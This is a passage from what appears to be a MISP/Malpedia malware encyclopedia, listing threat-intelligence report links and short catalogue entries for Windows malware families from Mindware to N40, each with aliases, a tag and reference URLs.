https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/

https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/

https://hub.dragos.com/hubfs/116-Whitepapers/Dragos_Intel_WP_InitAccess-IndEnvirons-Final.pdf

https://www.secureworks.com/research/threat-profiles/tin-woodlawn

https://www.verfassungsschutz.de/download/broschuere-2021-01-bfv-cyber-brief-2021-01.pdf

https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf

https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf

https://ics-cert.kaspersky.com/media/KASPERSKY_Steganography_in_targeted_attacks_EN.pdf

https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/china-apt-antlion-taiwan-financial-attacks

http://www.secureworks.com/research/threat-profiles/gold-kingswood

https://www.welivesecurity.com/2022/09/06/worok-big-picture/

https://us-cert.cisa.gov/ncas/alerts/aa20-275a

https://www.zdnet.com/article/fbi-says-an-iranian-hacking-group-is-attacking-f5-networking-devices/

https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Cyber-Sicherheit/Vorfaelle/Exchange-Schwachstellen-2021/MSExchange_Schwachstelle_Detektion_Reaktion.pdf

https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf

https://attack.mitre.org/groups/G0011

https://www.crowdstrike.com/blog/overwatch-elite-call-escalation-vital-to-containing-attack/

https://www.hvs-consulting.de/lazarus-report/

https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html

https://www.cisa.gov/uscert/ncas/alerts/aa22-152a

https://unit42.paloaltonetworks.com/atoms/obscureserpens/

https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx

https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/

https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions

https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/

https://www.accenture.com/us-en/blogs/security/ransomware-hades

https://attack.mitre.org/groups/G0096

https://www.secureworks.com/research/threat-profiles/bronze-vinewood

https://attack.mitre.org/groups/G0034

http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle

https://www.crowdstrike.com/blog/credential-theft-mimikatz-techniques/

https://awakesecurity.com/blog/catching-the-white-stork-in-flight/

https://www.secureworks.com/blog/ongoing-campaign-leveraging-exchange-vulnerability-potentially-linked-to-iran

https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/

https://twitter.com/swisscom_csirt/status/1354052879158571008

https://paraflare.com/attack-lifecycle-detection-of-an-operational-technology-breach/

https://medium.com/cycraft/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730

https://www.sentinelone.com/blog/detecting-a-rogue-domain-controller-dcshadow-attack/

https://www.breachquest.com/conti-leaks-insight-into-a-ransomware-unicorn/

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/locked-loaded-and-in-the-wrong-hands-legitimate-tools-weaponized-for-ransomware-in-2021

http://www.secureworks.com/research/threat-profiles/gold-burlap

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-009.pdf

https://unit42.paloaltonetworks.com/trigona-ransomware-update/

https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/

https://5851803.fs1.hubspotusercontent-na1.net/hubfs/5851803/Russian%20Ransomware%20C2%20Network%20Discovered%20in%20Censys%20Data.pdf

https://www.secureworks.com/research/samsam-ransomware-campaigns

https://www.ic3.gov/Media/News/2021/210823.pdf

http://www.secureworks.com/research/threat-profiles/gold-drake

https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis

https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf

https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments

https://symantec-blogs.broadcom.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions

https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos

https://www.rsa.com/content/dam/en/white-paper/the-shadows-of-ghosts-carbanak-report.pdf

https://www.ic3.gov/Media/News/2021/210527.pdf

https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf

https://www.varonis.com/blog/hive-ransomware-analysis

https://asec.ahnlab.com/ko/39682/

https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html

http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa

https://www.matteomalvica.com/blog/2020/01/30/mimikatz-lsass-dump-windg-pykd/

https://www.mandiant.com/resources/mandiant-red-team-emulates-fin11-tactics

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayling-taiwan-cyber-attacks

https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html

https://labs.f-secure.com/blog/catching-lazarus-threat-intelligence-to-real-detection-logic-part-two

https://www.mandiant.com/resources/unc215-chinese-espionage-campaign-in-israel

https://www.intrinsec.com/apt27-analysis/

https://www.infinitumit.com.tr/en/conti-ransomware-group-behind-the-karakurt-hacking-team/

https://assets.virustotal.com/reports/2021trends.pdf

https://www.theta.co.nz/news-blogs/cyber-security-blog/snakes-ladders-the-offensive-use-of-python-on-windows/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-152A_Karakurt_Data_Extortion_Group.pdf

https://noticeofpleadings.com/nickel/

https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

https://www.microsoft.com/security/blog/2021/12/06/nickel-targeting-government-organizations-across-latin-america-and-europe/

https://asec.ahnlab.com/ko/56256/

https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers

https://www.ic3.gov/media/news/2020/200917-1.pdf

https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf

https://ti.qianxin.com/blog/articles/Operation-OceanStorm:The-OceanLotus-hidden-under-the-abyss-of-the-deep/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-campaign-telecoms-asia-middle-east

https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage

https://www.secureworks.com/research/threat-profiles/cobalt-hickman

https://www.f-secure.com/content/dam/f-secure/en/consulting/our-thinking/collaterals/digital/f-secure-consulting-incident-readiness-proactive-response-guide-2020.pdf

https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east

https://www.devo.com/blog/detect-and-investigate-hafnium-using-devo/

https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf

https://news.sophos.com/en-us/2021/05/18/the-active-adversary-playbook-2021/?cmp=37153

https://blog.reversinglabs.com/blog/threat-analysis-follina-exploit-powers-live-off-the-land-attacks

https://www.secureworks.com/blog/ransomware-deployed-by-adversary

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-exchange-server-protection

https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom

https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout

https://securelist.com/the-sessionmanager-iis-backdoor/106868/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-china-ngo-government-attacks

https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/

http://www.secureworks.com/research/threat-profiles/gold-franklin

https://www.secureworks.com/research/threat-profiles/bronze-atlas

https://www.accenture.com/us-en/blogs/cyber-defense/double-extortion-campaigns

https://blogs.blackberry.com/en/2022/09/the-curious-case-of-monti-ransomware-a-real-world-doppelganger

https://github.com/gentilkiwi/mimikatz

https://volatility-labs.blogspot.com/2021/10/memory-forensics-r-illustrated.html

https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf

https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/

https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf

https://www.secureworks.com/research/bronze-vinewood-targets-supply-chains

https://twitter.com/inversecos/status/1456486725664993287

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta

https://www.infinitumit.com.tr/apt-35/

https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass

https://asec.ahnlab.com/en/47455/

https://www.mandiant.com/resources/blog/alphv-ransomware-backup

https://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html

https://attackiq.com/2022/06/03/attack-graph-response-to-us-cert-aa22-152a-karakurt-data-extortion-group/

https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/

https://www.microsoft.com/security/blog/2021/11/18/iranian-targeting-of-it-sector-on-the-rise/

https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf

https://www.secureworks.com/research/threat-profiles/gold-kingswood

https://securelist.com/the-lazarus-group-deathnote-campaign/109490/

https://www.cisa.gov/sites/default/files/2023-09/aa23-250a-apt-actors-exploit-cve-2022-47966-and-cve-2022-42475.pdf

Mindware

Ransomware, potential rebranding of win.sfile.

The tag is: misp-galaxy:malpedia="Mindware"

Mindware is also known as:

Table 4021. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mindware

https://www.sentinelone.com/blog/from-the-front-lines-another-rebrand-mindware-and-sfile-ransomware-technical-breakdown/

miniBlindingCan

miniBlindingCan is an HTTP(S) orchestrator.

It is a variant of the BlindingCan RAT, having the same command parsing logic, but supporting only a small subset of commands available previously. The main operations are the update of the malware configuration, and the download and execution of additional payloads from the attackers' C&C.

The miniBlindingCan malware was used in Operation DreamJob attacks against aerospace and media companies in Q2-Q3 2022.

The tag is: misp-galaxy:malpedia="miniBlindingCan"

miniBlindingCan is also known as:

  • AIRDRY.V2

  • EventHorizon

Table 4024. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.miniblindingcan

https://www.mandiant.com/resources/blog/dprk-whatsapp-phishing

https://www.welivesecurity.com/en/eset-research/lazarus-luring-employees-trojanized-coding-challenges-case-spanish-aerospace-company/

https://www.virusbulletin.com/uploads/pdf/conference/vb2023/papers/Lazarus-campaigns-and-backdoors-in-2022-2023.pdf

https://www.microsoft.com/security/blog/2022/09/29/zinc-weaponizing-open-source-software/

MiniStealer

The tag is: misp-galaxy:malpedia="MiniStealer"

MiniStealer is also known as:

Table 4026. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ministealer

https://blog.cyble.com/2022/08/29/mini-stealer-possible-predecessor-of-parrot-stealer/

miniTypeFrame

miniTYPEFRAME is a variant of TYPEFRAME, a RAT for Windows.

Its functionality is reduced to serve mostly as a proxy module. Its commands are indexed by 16-bit integers, usually in the range 0x8027–0x8044.

The tag is: misp-galaxy:malpedia="miniTypeFrame"

miniTypeFrame is also known as:

Table 4027. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.minitypeframe

https://www.cisa.gov/news-events/analysis-reports/ar18-165a

MintStealer

The tag is: misp-galaxy:malpedia="MintStealer"

MintStealer is also known as:

Table 4028. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mintstealer

https://twitter.com/ViriBack/status/1610393842787704835

MirageFox

The tag is: misp-galaxy:malpedia="MirageFox"

MirageFox is also known as:

Table 4030. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.miragefox

https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/

MirrorBlast

According to Minerva Labs, MirrorBlast malware is a trojan that is known for attacking users’ browsers. It usually pretends to be a legitimate browser add-on however it has now evolved additional capabilities, whereby other malwares are installed simultaneously. Recently, this trojan is thought to have tentative links to TA505 and PYSA groups.

The tag is: misp-galaxy:malpedia="MirrorBlast"

MirrorBlast is also known as:

Table 4032. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mirrorblast

https://www.proofpoint.com/us/daily-ruleset-update-summary-20210924

https://www.proofpoint.com/us/blog/threat-insight/whatta-ta-ta505-ramps-activity-delivers-new-flawedgrace-variant

https://frsecure.com/blog/the-rebol-yell-new-rebol-exploit/

https://threatresearch.ext.hp.com/mirrorblast-and-ta505-examining-similarities-in-tactics-techniques-and-procedures/

https://blog.morphisec.com/explosive-new-mirrorblast-campaign-targets-financial-companies

MirrorKey

According to Trend Micro, this is a loader for win.transbox, used by threat actor Earth Yako.

The tag is: misp-galaxy:malpedia="MirrorKey"

MirrorKey is also known as:

Table 4033. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mirrorkey

https://www.trendmicro.com/en_us/research/23/b/invitation-to-secret-event-uncovering-earth-yako-campaigns.html

Misdat

The tag is: misp-galaxy:malpedia="Misdat"

Misdat is also known as:

Table 4034. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.misdat

https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf

Misfox

The tag is: misp-galaxy:malpedia="Misfox"

Misfox is also known as:

  • MixFox

  • ModPack

Table 4035. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.misfox

Misha

Undocumented information stealer targeting multiple browsers and cryptocurrences. Internal project name appears to be "misha".

The tag is: misp-galaxy:malpedia="Misha"

Misha is also known as:

Table 4036. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.misha

https://blog.bushidotoken.net/2022/11/detecting-and-fingerprinting.html

https://bazaar.abuse.ch/sample/efab8bfe43de6edf96f9451a5a2cc15017cfc5c88f81b46b33e6ba5c7e2d7a7b/

Mispadu

According to ESET Research, Mispadu is an ambitious Latin American banking trojan that utilizes McDonald’s malvertising and extends its attack surface to web browsers. It is used to target the general public and its main goals are monetary and credential theft. In Brazil, ESET has seen it distributing a malicious Google Chrome extension that attempts to steal credit card data and online banking data, and that compromises the Boleto payment system.

The tag is: misp-galaxy:malpedia="Mispadu"

Mispadu is also known as:

  • URSA

Table 4037. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mispadu

https://seguranca-informatica.pt/ursa-trojan-is-back-with-a-new-dance/.YyXEkaRBzIU

https://blog.scilabs.mx/cyber-threat-profile-malteiro/

https://blog.scilabs.mx/en/cyber-threat-profile-malteiro/

https://seguranca-informatica.pt/threat-analysis-the-emergent-ursa-trojan-impacts-many-countries-using-a-sophisticated-loader/

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/mispadu-banking-trojan-resurfaces

https://www.welivesecurity.com/2019/11/19/mispadu-advertisement-discounted-unhappy-meal/

MISTCLOAK

Mandiant associates this with UNC4191, this malware decrypts and runs DARKDEW.

The tag is: misp-galaxy:malpedia="MISTCLOAK"

MISTCLOAK is also known as:

  • HIUPAN

Table 4038. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mistcloak

https://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia

https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related/

Miuref

The tag is: misp-galaxy:malpedia="Miuref"

Miuref is also known as:

Table 4040. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.miuref

MMON

The tag is: misp-galaxy:malpedia="MMON"

MMON is also known as:

  • Kaptoxa

Table 4041. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mmon

http://reversing.fun/posts/2022/01/02/mmon.html

MM Core

The tag is: misp-galaxy:malpedia="MM Core"

MM Core is also known as:

Table 4042. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mm_core

MobiRAT

The tag is: misp-galaxy:malpedia="MobiRAT"

MobiRAT is also known as:

Table 4043. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mobi_rat

https://blog.malwarebytes.com/threat-analysis/2017/07/malware-abusing-ffmpeg/

Mocky LNK

LNK files used to lure and orchestrate execution of various scripts, interacting with the Mocky API service.

The tag is: misp-galaxy:malpedia="Mocky LNK"

Mocky LNK is also known as:

Table 4044. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mocky_lnk

https://cert.gov.ua/article/4492467

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-009.pdf

https://www.zscaler.com/blogs/security-research/steal-it-campaign

Mocton

The tag is: misp-galaxy:malpedia="Mocton"

Mocton is also known as:

Table 4045. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mocton

ModernLoader

According to PCrisk, ModernLoader, also known as Avatar Bot and AvatarLoader, is a malicious program that has minimalistic loader and RAT (Remote Access Trojan) functionalities.

Loader-type malware is designed to infect devices with additional malicious programs, while RATs enable remote access/control over infected machines. ModernLoader is capable of executing basic commands and injecting malicious modules into systems.

The tag is: misp-galaxy:malpedia="ModernLoader"

ModernLoader is also known as:

  • AvatarBot

Table 4046. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.modern_loader

https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html

ModPipe

ModPipe is point-of-sale (POS) malware capable of accessing sensitive information stored in devices running ORACLE MICROS Restaurant Enterprise Series (RES) 3700 POS – a management software suite used by hundreds of thousands of bars, restaurants, hotels and other hospitality establishments worldwide. ModPipe uses modular architecture consisting of basic components and downloadable modules. One of them – named GetMicInfo – contains an algorithm designed to gather database passwords by decrypting them from Windows registry values. Exfiltrated credentials allow ModPipe’s operators access to database contents, including various definitions and configuration, status tables and information about POS transactions.

The tag is: misp-galaxy:malpedia="ModPipe"

ModPipe is also known as:

Table 4048. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.modpipe

https://www.foregenix.com/blog/modpipe-malware-has-a-new-module-that-siphons-payment-card-data

https://www.welivesecurity.com/2020/11/12/hungry-data-modpipe-backdoor-hits-pos-software-hospitality-sector/

https://www.kroll.com/en/insights/publications/cyber/modpipe-pos-malware-new-hooking-targets-extract-card-data

Mofksys

The tag is: misp-galaxy:malpedia="Mofksys"

Mofksys is also known as:

Table 4050. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mofksys

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/PE_MOFKSYS.A/

Moisha Ransomware

The tag is: misp-galaxy:malpedia="Moisha Ransomware"

Moisha Ransomware is also known as:

Table 4051. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.moisha

https://id-ransomware.blogspot.com/2022/08/moisha-ransomware.html

MoleNet

MoleNet is a .NET downloader malware used by the Molerats group in targeted attacks in the Middle East. Before downloading additional payloads, it first collects information about the infected machine using WMI queries and sends the data to its operators. It was first discovered in 2020, however, Cybereason researchers showed that it has been in use since at least 2019, with infrastructure that operated since 2017.

The tag is: misp-galaxy:malpedia="MoleNet"

MoleNet is also known as:

Table 4055. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.molenet

https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign

MontysThree

The tag is: misp-galaxy:malpedia="MontysThree"

MontysThree is also known as:

  • MT3

Table 4060. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.montysthree

https://securelist.com/montysthree-industrial-espionage/98972/

MoonBounce

MoonBounce is a malware embedded into a modified UEFI firmware. Placed into SPI flash, it can provide persistence across full reinstall and even disk replacements. MoonBounce deploys user-mode malware through in-memory staging with a small footprint.

The tag is: misp-galaxy:malpedia="MoonBounce"

MoonBounce is also known as:

Table 4061. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.moonbounce

https://www.binarly.io/posts/A_deeper_UEFI_dive_into_MoonBounce/index.html

https://habr.com/ru/amp/post/668154/

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/19115831/MoonBounce_technical-details_eng.pdf

https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/

Moriya

This tool is a passive backdoor which allows attackers to inspect all incoming traffic to the infected machine, filter out packets that are marked as designated for the malware and respond to them. This forms a covert channel over which attackers are able to issue shell commands and receive back their outputs.

The tag is: misp-galaxy:malpedia="Moriya"

Moriya is also known as:

Table 4064. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.moriya

https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831/

Morphine

The tag is: misp-galaxy:malpedia="Morphine"

Morphine is also known as:

Table 4065. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.morphine

MortalKombat

The tag is: misp-galaxy:malpedia="MortalKombat"

MortalKombat is also known as:

Table 4066. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mortalkombat

https://blog.talosintelligence.com/new-mortalkombat-ransomware-and-laplas-clipper-malware-threats/

MosaicRegressor

The tag is: misp-galaxy:malpedia="MosaicRegressor"

MosaicRegressor is also known as:

Table 4068. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mosaic_regressor

https://securelist.com/mosaicregressor/98849/

Moserpass

The tag is: misp-galaxy:malpedia="Moserpass"

Moserpass is also known as:

Table 4069. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.moserpass

https://www.csis.dk/newsroom-blog-overview/2021/moserpass-supply-chain/

Mount Locker

According to BlackBerry, MountLocker is a Ransomware-as-a-Service (RaaS), active since July 2020 The MountLocker ransomware was updated during early November 2020 to broaden the targeting of file types and evade security software. Victim’s files are encrypted using ChaCha20, and file encryption keys are encrypted using RSA-2048. The ransomware appears to be somewhat secure; there are no trivial weaknesses allowing for easy key recovery and decryption of data. MountLocker does however use a cryptographically insecure method for key generation that may be prone to attack.

The tag is: misp-galaxy:malpedia="Mount Locker"

Mount Locker is also known as:

  • DagonLocker

  • MountLocker

  • QuantumLocker

Table 4071. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mount_locker

https://news.sophos.com/en-us/2021/03/31/sophos-mtr-in-real-time-what-is-astro-locker-team/

https://securityintelligence.com/posts/itg23-crypters-cooperation-between-cybercriminal-groups/

https://www.bleepingcomputer.com/news/security/biotech-research-firm-miltenyi-biotec-hit-by-ransomware-data-leaked/

https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/

https://dissectingmalwa.re/between-a-rock-and-a-hard-place-exploring-mount-locker-ransomware.html

https://github.com/Finch4/Malware-Analysis-Reports/tree/main/MountLocker

https://www.bleepingcomputer.com/news/security/mount-locker-ransomware-joins-the-multi-million-dollar-ransom-game/

https://blogs.blackberry.com/en/2020/12/mountlocker-ransomware-as-a-service-offers-double-extortion-capabilities-to-affiliates

https://www.bleepingcomputer.com/news/security/mount-locker-ransomware-now-targets-your-turbotax-tax-returns/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-virtual-machines

https://chuongdong.com/reverse%20engineering/2021/05/23/MountLockerRansomware/

https://community.riskiq.com/article/47766fbd

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v

https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/

https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/

https://intel471.com/blog/how-cybercriminals-create-turbulence-for-the-transportation-industry

https://securityscorecard.pathfactory.com/research/quantum-ransomware

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://securityintelligence.com/posts/trickbot-conti-crypters-where-are-they-now/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/

https://www.guidepointsecurity.com/mount-locker-ransomware-steps-up-counter-ir-capabilities/

https://kienmanowar.wordpress.com/2021/08/04/quicknote-mountlocker-some-pseudo-code-snippets/

https://blogs.blackberry.com/en/2021/11/zebra2104

https://www.trendmicro.com/en_us/research/21/j/ransomware-operators-found-using-new-franchise-business-model.html

https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/

https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf

https://www.cybereason.com/blog/cybereason-vs.-quantum-locker-ransomware

https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/

Moure

The tag is: misp-galaxy:malpedia="Moure"

Moure is also known as:

Table 4072. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.moure

mozart

According to PCrisk, Mozart is malicious software that allows attackers (cyber criminals) to execute various commands on an infected computer through the DNS protocol. This communication method helps cyber criminals to avoid detection via security software. Mozart is categorized as a malware loader and executes commands that cause download and installation of malicious software.

The tag is: misp-galaxy:malpedia="mozart"

mozart is also known as:

Table 4073. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mozart

https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2015-01-11-the-mozart-ram-scraper.md

https://securitykitten.github.io/2015/01/11/the-mozart-ram-scraper.html

MRAC

Ransomware.

The tag is: misp-galaxy:malpedia="MRAC"

MRAC is also known as:

Table 4076. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mrac

https://id-ransomware.blogspot.com/2021/12/mrac-ransomware.html

MrDec

Ransomware.

The tag is: misp-galaxy:malpedia="MrDec"

MrDec is also known as:

Table 4077. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mrdec

https://dissectingmalwa.re/i-literally-cant-think-of-a-fitting-pun-mrdec-ransomware.html

MrPeter

The tag is: misp-galaxy:malpedia="MrPeter"

MrPeter is also known as:

Table 4078. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mr_peter

https://github.com/mrfr05t/Mr.Peter

murkytop

a command-line reconnaissance tool. It can be used to execute files as a different user, move, and delete files locally, schedule remote AT jobs, perform host discovery on connected networks, scan for open ports on hosts in a connected network, and retrieve information about the OS, users, groups, and shares on remote hosts.

The tag is: misp-galaxy:malpedia="murkytop"

murkytop is also known as:

Table 4082. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.murkytop

https://www.secureworks.com/research/threat-profiles/bronze-mohawk

https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html

Mutabaha

The tag is: misp-galaxy:malpedia="Mutabaha"

Mutabaha is also known as:

Table 4084. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mutabaha

http://vms.drweb.ru/virus/?_is=1&i=8477920

MyloBot

According to PCrisk, MyloBot is a high-risk trojan-type virus that allows cyber criminals to control the infected machine. MyloBot can be considered as a botnet, since all infected computers are connected to a single network. Depending on cyber criminals' goals, infected machines might be misused or have additional infections applied.

The tag is: misp-galaxy:malpedia="MyloBot"

MyloBot is also known as:

  • FakeDGA

  • WillExec

Table 4088. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mylobot

https://github.com/360netlab/DGA/issues/36

https://www.bitsight.com/blog/mylobot-investigating-proxy-botnet

http://www.freebuf.com/column/153424.html

http://blog.talosintelligence.com/2017/10/threat-round-up-1020-1017.html

https://ti.qianxin.com/blog/articles/Analysis-of-Recent-Activities-of-the-Mylobot-Botnet-EN/

https://www.deepinstinct.com/2018/06/20/meet-mylobot-a-new-highly-sophisticated-never-seen-before-botnet-thats-out-in-the-wild/

https://blogs.akamai.com/sitr/2021/01/detecting-mylobot-unseen-dga-based-malware-using-deep-learning.html

https://blog.centurylink.com/mylobot-continues-global-infections/

Mystic Stealer

According to ZScaler, a new information stealer that was first advertised in April 2023, capable of stealing credentials from nearly 40 web browsers and more than 70 browser extensions, also targeting cryptocurrency wallets, Steam, and Telegram. The code is heavily obfuscated making use of polymorphic string obfuscation, hash-based import resolution, and runtime calculation of constants. Mystic implements a custom binary protocol that is encrypted with RC4.

The tag is: misp-galaxy:malpedia="Mystic Stealer"

Mystic Stealer is also known as:

Table 4090. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mystic_stealer

https://www.zscaler.com/blogs/security-research/mystic-stealer

MZRevenge

The tag is: misp-galaxy:malpedia="MZRevenge"

MZRevenge is also known as:

  • MaMo434376

Table 4091. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mzrevenge

https://dissectingmalwa.re/a-projectexe-that-should-have-stayed-in-a-drawer-mzrevenge-mamo434376.html

N40

Botnet with focus on banks in Latin America and South America. Relies on DLL Sideloading attacks to execute malicious DLL files. Uses legitimate VMWare executable in attacks. As of March 2019, the malware is under active development with updated versions coming out on persistent basis.

The tag is: misp-galaxy:malpedia="N40"

N40 is also known as:

Table 4092. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.n40

https://socprime.com/en/news/attackers-exploit-dll-hijacking-to-bypass-smartscreen/

